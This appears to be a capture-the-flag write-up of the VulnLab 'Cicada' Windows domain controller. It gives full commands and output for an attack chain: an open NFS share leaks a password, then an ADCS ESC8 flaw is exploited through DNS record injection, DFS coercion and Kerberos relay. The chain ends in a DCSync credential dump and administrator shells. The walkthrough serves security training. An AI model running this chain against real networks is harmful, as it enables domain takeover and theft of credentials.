VulnLab Cicada
VulnLab Cicada
Cicada
Recon
1
2
3
4
└─$ rustscan -g -r 1-65535 -a 10.10.97.220
10.10.97.220 -> [53,80,88,111,135,139,389,445,464,593,636,2049,3269,3268,3389,5985,9389]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
└─$ nmap -sC -sV -p53,80,88,111,135,139,389,445,464,593,636,2049,3269,3268,3389,5985,9389 10.10.97.220
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 00:13 +06
Nmap scan report for 10.10.97.220
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-15 18:12:26Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
2049/tcp open nlockmgr 1-4 (RPC #100021)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Not valid before: 2025-02-14T18:10:41
|_Not valid after: 2025-08-16T18:10:41
|_ssl-date: 2025-02-15T18:13:51+00:00; -1m24s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC-JPQ225; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1m24s, deviation: 0s, median: -1m24s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-02-15T18:13:12
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 153.51 seconds
Root
We see NFS, which contains directory /profiles
1
2
3
└─$ showmount -e cicada.vl
Export list for cicada.vl:
/profiles (everyone)
We mount it and find user homes
1
└─$ sudo mount -t nfs cicada.vl:/profiles $PWD/share
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
└─$ tree -L 2 share
share
├── Administrator
│ ├── Documents
│ └── vacation.png
├── Daniel.Marshall
├── Debra.Wright
├── Jane.Carter
├── Jordan.Francis
├── Joyce.Andrews
├── Katie.Ward
├── Megan.Simpson
├── Richard.Gibbons
├── Rosie.Powell
│ ├── Documents
│ └── marketing.png
└── Shirley.West
14 directories, 2 files
Rosie.Powell has password in the picture
1
└─$ sudo cp share/Rosie.Powell/marketing.png .
1
└─$ sudo eog marketing.png
If we try creds, we receive message STATUS_NOT_SUPPORTED
, meaning NTLM
is not enabled
1
2
3
└─$ nxc smb cicada.vl -u 'rosie.powell' -p '<REDACTED>'
SMB 10.10.97.220 445 10.10.97.220 [*] x64 (name:10.10.97.220) (domain:10.10.97.220) (signing:True) (SMBv1:False)
SMB 10.10.97.220 445 10.10.97.220 [-] 10.10.97.220\rosie.powell:<REDACTED> STATUS_NOT_SUPPORTED
So we authenticate using kerberos and the creds are valid
1
2
3
└─$ nxc smb dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k
SMB dc-jpq225.cicada.vl 445 dc-jpq225 [*] x64 (name:dc-jpq225) (domain:cicada.vl) (signing:True) (SMBv1:False)
SMB dc-jpq225.cicada.vl 445 dc-jpq225 [+] cicada.vl\rosie.powell:<REDACTED>
There’s ADCS, which is probably related to port 80
1
2
3
4
5
6
└─$ nxc ldap dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k -M adcs
LDAP dc-jpq225.cicada.vl 389 DC-JPQ225 [*] None (name:DC-JPQ225) (domain:cicada.vl)
LDAP dc-jpq225.cicada.vl 389 DC-JPQ225 [+] cicada.vl\rosie.powell:<REDACTED>
ADCS dc-jpq225.cicada.vl 389 DC-JPQ225 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS dc-jpq225.cicada.vl 389 DC-JPQ225 Found PKI Enrollment Server: DC-JPQ225.cicada.vl
ADCS dc-jpq225.cicada.vl 389 DC-JPQ225 Found CN: cicada-DC-JPQ225-CA
Let’s get ticket and use it with certipy
1
2
3
4
└─$ getTGT.py cicada.vl/rosie.powell:'<REDACTED>' -dc-ip dc-jpq225.cicada.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in rosie.powell.ccache
We find that ADCS is vulnerable to ESC8
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
└─$ KRB5CCNAME=rosie.powell.ccache certipy find -k -no-pass -debug -dc-ip dc-jpq225.cicada.vl -ns 10.10.97.220 -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Domain retrieved from CCache: CICADA.VL
<SNIP>
Certificate Authorities
0
CA Name : cicada-DC-JPQ225-CA
DNS Name : DC-JPQ225.cicada.vl
Certificate Subject : CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl
Certificate Serial Number : 491BDD500EA006974F23E975392B6C4E
Certificate Validity Start : 2025-02-15 18:06:51+00:00
Certificate Validity End : 2525-02-15 18:16:51+00:00
Web Enrollment : Enabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : CICADA.VL\Administrators
Access Rights
ManageCertificates : CICADA.VL\Administrators
CICADA.VL\Domain Admins
CICADA.VL\Enterprise Admins
ManageCa : CICADA.VL\Administrators
CICADA.VL\Domain Admins
CICADA.VL\Enterprise Admins
Enroll : CICADA.VL\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates : [!] Could not find any certificate templates
The MachineAccountQuota is set to 10, so we can create/join computer
1
2
3
4
5
└─$ nxc ldap dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k -M maq
LDAP dc-jpq225.cicada.vl 389 DC-JPQ225 [*] None (name:DC-JPQ225) (domain:cicada.vl)
LDAP dc-jpq225.cicada.vl 389 DC-JPQ225 [+] cicada.vl\rosie.powell:<REDACTED>
MAQ dc-jpq225.cicada.vl 389 DC-JPQ225 [*] Getting the MachineAccountQuota
MAQ dc-jpq225.cicada.vl 389 DC-JPQ225 MachineAccountQuota: 10
According to multiple blogs, we can perform kerberos relay:
- https://www.synacktiv.com/en/publications/relaying-kerberos-over-smb-using-krbrelayx
- https://www.tiraniddo.dev/2024/04/relaying-kerberos-authentication-from.html
There is a way to do it from Windows machine and it requires MachineAccountQuota
, but we will do it from linux so we don’t need that. The only thing we need is to to create A record pointing to our box, which has to have the form described in blogs. Knowing that by default all authenticated users can create A record if it doesn’t exist, we can abuse that:
1
2
3
└─$ bloodyAD.py --host dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k -d 'cicada.vl' add dnsRecord 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.8.4.147
[+] dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
For coercing, use dfscoerce.py (feel free to try other coercion methods)
1
2
3
4
5
6
7
8
9
10
11
12
└─$ KRB5CCNAME=rosie.powell.ccache python3 dfscoerce.py -k -no-pass 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' dc-jpq225.cicada.vl
[-] Connecting to ncacn_np:dc-jpq225.cicada.vl[\PIPE\netdfs]
[+] Successfully bound!
[-] Sending NetrDfsRemoveStdRoot!
NetrDfsRemoveStdRoot
ServerName: 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA\x00'
RootShare: 'test\x00'
ApiFlags: 1
DFSNM SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found.
Make sure to pull latest update for krbrelayx and start it before coercing
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
└─$ krbrelayx.py -t 'http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp' --adcs --template DomainController -v 'DC-JPQ225$'
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.97.220
[*] HTTP server returned status code 200, treating as a successful login
[*] SMBD: Received connection from 10.10.97.220
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] Skipping user DC-JPQ225$ since attack was already performed
[*] GOT CERTIFICATE! ID 20
[*] Writing PKCS#12 certificate to ./DC-JPQ225$.pfx
[*] Certificate successfully written to file
We got our certificate, so now let’s get ticket for domain controller
1
2
3
4
5
6
7
8
9
10
11
12
└─$ gettgtpkinit.py -cert-pfx 'DC-JPQ225$.pfx' 'cicada.vl/DC-JPQ225$' DC-JPQ225.ccache
2025-02-16 02:25:54,246 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-02-16 02:25:54,540 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-02-16 02:26:05,870 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-02-16 02:26:05,870 minikerberos INFO c326fc1b13c7afc395e785808254612a8948420d28e3f1b481e8ed7a8b6c60d9
INFO:minikerberos:c326fc1b13c7afc395e785808254612a8948420d28e3f1b481e8ed7a8b6c60d9
2025-02-16 02:26:05,872 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
DCSync using the ticket
1
2
3
4
5
6
7
8
└─$ KRB5CCNAME=DC-JPQ225.ccache secretsdump.py -k -no-pass DC-JPQ225.cicada.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>
Configure krb5.conf to be able to use evil-winrm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─$ cat krb5.conf
[libdefaults]
default_realm = CICADA.VL
dns_lookup_realm = true
dns_lookup_kdc = true
[realms]
CICADA.VL = {
kdc = dc-jpq225.cicada.vl
admin_server = dc-jpq225.cicada.vl
default_domain = dc-jpq225.cicada.vl
}
[domain_realm]
cicada.vl = CICADA.VL
.cicada.vl = CICADA.VL
Then use set env variables and connect
1
2
3
4
5
6
7
8
9
10
11
12
└─$ KRB5_CONFIG=krb5.conf KRB5CCNAME=administrator@DC-JPQ225.cicada.vl.ccache evil-winrm -i DC-JPQ225.cicada.vl -u administrator -r CICADA.VL
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: User is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\dc-jpq225\profiles$\Administrator\Documents>
Or simply wmiexec.py
1
2
3
4
5
6
7
8
└─$ KRB5CCNAME=administrator@DC-JPQ225.cicada.vl.ccache wmiexec.py -k -no-pass DC-JPQ225.cicada.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type \users\administrator\desktop\root.txt
https://api.vulnlab.com/api/v1/share?id=56b13afc-3db2-468d-9536-dd298b39aab4